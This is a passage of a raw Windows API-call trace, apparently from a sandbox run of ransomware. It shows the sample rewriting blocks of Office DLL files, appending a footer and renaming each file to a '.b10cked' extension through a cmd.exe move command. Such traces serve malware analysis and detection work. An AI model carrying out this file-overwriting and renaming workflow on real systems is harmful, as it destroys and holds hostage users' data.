returned 1 [0162.034] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.034] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.034] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0162.034] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.034] ReleaseMutex (hMutex=0xf8) returned 1 [0162.034] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.034] ReleaseMutex (hMutex=0xf8) returned 1 [0162.034] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.035] ReleaseMutex (hMutex=0xf8) returned 1 [0162.035] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.035] ReleaseMutex (hMutex=0xf8) returned 1 [0162.035] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21882416166) returned 1 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3878 [0162.036] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0162.048] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d60 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d60 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.049] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.050] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7855, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb1 [0162.050] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7855, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb1 [0162.050] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0162.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLSLICER.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0162.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d60 [0162.054] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0162.054] CloseHandle (hObject=0x114) returned 1 [0162.055] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX") returned 0x3c [0162.056] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0162.056] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xfbc, dwThreadId=0x86c)) returned 1 [0162.136] CloseHandle (hObject=0x1b4) returned 1 [0162.136] CloseHandle (hObject=0x114) returned 1 [0162.136] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.136] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.136] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21892705571) returned 1 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3278 [0162.139] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3760 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3760 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.157] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1baf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1baf, lpOverlapped=0x0) returned 1 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.158] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1baf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1baf, lpOverlapped=0x0) returned 1 [0162.158] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7087, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bb1 [0162.158] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1baf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1baf, lpOverlapped=0x0) returned 1 [0162.159] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7087, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bb1 [0162.159] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1baf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1baf, lpOverlapped=0x0) returned 1 [0162.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0162.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0162.164] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: 